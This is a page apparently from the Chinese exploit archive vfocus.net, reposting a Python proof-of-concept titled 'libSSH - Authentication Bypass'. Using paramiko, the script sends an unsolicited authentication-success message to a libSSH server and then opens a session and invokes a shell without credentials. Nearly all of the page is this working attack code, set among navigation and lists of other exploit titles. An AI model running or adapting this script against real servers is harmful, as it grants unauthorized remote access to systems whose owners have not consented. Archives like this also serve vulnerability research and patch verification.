首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
libSSH - Authentication Bypass
来源:vfocus.net 作者:Soyadlı 发布时间:2018-10-22  
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
 
 
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
 
args = parser.parse_args()
 
 
def BypasslibSSHwithoutcredentials(hostname, port):
    
    sock = socket.socket()
    try:
        sock.connect((str(hostname), int(port)))
 
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
  
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
    
        spawncmd = transport.open_session()
        spawncmd.invoke_shell()
        return 0
    
    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1
 
 
def main():
    paramiko.util.log_to_file(args.logfile)
    try:
        hostname = args.host
        port = args.port
    except:
        parser.print_help()
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port)
 
if __name__ == '__main__':
    exit(main())
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Git Submodule Arbitrary Code E
·Microsoft Windows SetImeInfoEx
·Any Sound Recorder 2.93 Buffer
·Academic Timetable Final Build
·FLIR Brickstream 3D+ - RTSP St
·FLIR AX8 Thermal Camera 1.32.1
·Snes9K 0.0.9z - Buffer Overflo
·Solaris RSH Stack Clash Privil
·NoMachine 5.3.26 Remote Code E
·FluxBB < 1.5.6 - SQL Injection
·Phoenix Contact WebVisit 29857
·Phoenix Contact WebVisit 6.40.
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved